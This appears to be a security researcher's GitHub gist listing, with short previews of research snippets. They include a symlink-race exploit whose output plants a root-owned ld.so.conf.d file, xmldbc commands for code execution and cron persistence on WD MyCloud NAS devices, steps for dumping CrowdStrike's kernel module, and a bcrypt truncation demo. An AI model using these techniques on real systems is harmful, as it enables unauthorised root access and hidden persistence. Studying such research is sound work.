Tim Brown timb-machine

View GitHub Profile
@timb-machine
timb-machine / Racey monkey
Created October 19, 2025 18:20
Racey monkey
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
    while (symlink(argv[2], argv[1])) {
    }
    printf("w00t!\n");
}
timb-machine / Racey, racey, catch the backups
Created October 19, 2025 14:34
Racey, racey, catch the backups
$ ./sploit /var/opt/XXXXNN-XXX/XXXX/XXX/XNN.XXXXX /etc/ld.so.conf.d/pwnies.conf
w00p!
$ ls -la /etc/ld.so.conf.d/pwnies.conf
-rw-r--r-- 1 root root 101 Oct 19 15:32 /etc/ld.so.conf.d/pwnies.conf
timb-machine / Remote tar :(
Last active August 30, 2025 16:39
Remote tar :(
$ tar --version
tar (GNU tar) 1.34
Copyright © 2021 Free Software Foundation, Inc.
Licence GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by John Gilmore and Jay Fenlason.
$ tar ztvf file\:M.m.p.tar.gz
The authenticity of host 'file (192.168.67.59)' can't be established.
timb-machine / Early implementation of Place in Kill Chain
Created June 26, 2025 20:17
Early implementation of Place in Kill Chain
$ python3 PiKC.py
=== System Parameters Summary ===
System Role: web server
Open Ports: [80, 443, 8080]
IP Addresses: ['203.0.113.50']
Software: Apache httpd 2.4.54
Interactive User: False
Critical Asset: False
Virtualized: False
timb-machine / So you just want code execution on your NAS?
Created June 5, 2025 21:15
So you just want code execution on your NAS?
If you don't need persistence, why work so hard?
$ rm /foo; xmldbc -t "test:10:touch /foo"; ls -la /foo; xmldbc -D /tmp/config.xml; sleep 20; ls -la /foo
ls: /foo: No such file or directory
-rw-r--r-- 1 root root 0 Jun 5 22:11 /foo
timb-machine / Adding persistence to WD MyCloud NAS device cron...
Last active August 30, 2025 16:36
Adding persistence to WD MyCloud NAS device cron...
Say, for example, you wanted a cron entry that would run persist.sh every 5 minutes...
$ xmldbc -s /system_mgr/crond/list/count "9"
$ xmldbc -s /system_mgr/crond/list/name:9 "persist"
$ xmldbc -s /system_mgr/crond/persist/count "1"
$ xmldbc -s /system_mgr/crond/persist/item:1/method "3"
$ xmldbc -s /system_mgr/crond/persist/item:1/1 "*/5"
$ xmldbc -s /system_mgr/crond/persist/item:1/2 "*"
$ xmldbc -s /system_mgr/crond/persist/item:1/3 "*"
$ xmldbc -s /system_mgr/crond/persist/item:1/4 "*"
timb-machine / Dumping CrowdStrike's LKM
Created May 10, 2025 16:16
Dumping CrowdStrike's LKM
Falcon-sensor strace:
1185 init_module(0x556ce33f8b00, 204357, "") = 0
1185 init_module(0x556ce3430940, 122757, "") = 0
1185 init_module(0x556ce342a950, 24541, "") = 0
1185 init_module(0x7f33243be010, 1718317, "configbuild=1007.8.0012905.1") = 0
(gdb) catch syscall init_module
(gdb) run
timb-machine / ssh sshgw.stromberg.org
Last active May 10, 2025 16:17
ssh sshgw.stromberg.org

$ ssh sshgw.stromberg.org
The authenticity of host 'sshgw.stromberg.org (136.47.201.206)' can't be established.
RSA key fingerprint is SHA256:VqUUSiSuOQhm+3vrJG9VDb4fWa2dM23Th23T9D88+L4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sshgw.stromberg.org' (RSA) to the list of known hosts.
OpenBSD 7.3 (GENERIC.MP) #0: Thu May 18 19:05:43 MDT 2023

Welcome to OpenBSD: The proactively secure Unix-like operating system.

timb-machine / Example of bcrypt() weakness around input string truncation (the choice of PHP is arbitrary)
Created March 1, 2025 21:47
Example of bcrypt() weakness around input string truncation (the choice of PHP is arbitrary)
<?php
if (password_hash("123567890123567890123567890123567890123567890123567890123567890123456789" . "test", PASSWORD_BCRYPT, ["salt" => "1234567890123456789012"]) === password_hash("123567890123567890123567890123567890123567890123567890123567890123456789" . "hell", PASSWORD_BCRYPT, ["salt" => "1234567890123456789012"])) {
    print "matches\n";
}
?>
timb-machine / unix-audit DSL prototype
Last active August 1, 2023 05:58
unix-audit DSL prototype
platformtags:
  - "linux"
checks:
  - type: "Informational"
    checks:
      - name: "Platform"
        exec:
          - command: "uname"
            stderr: true
            encode: ""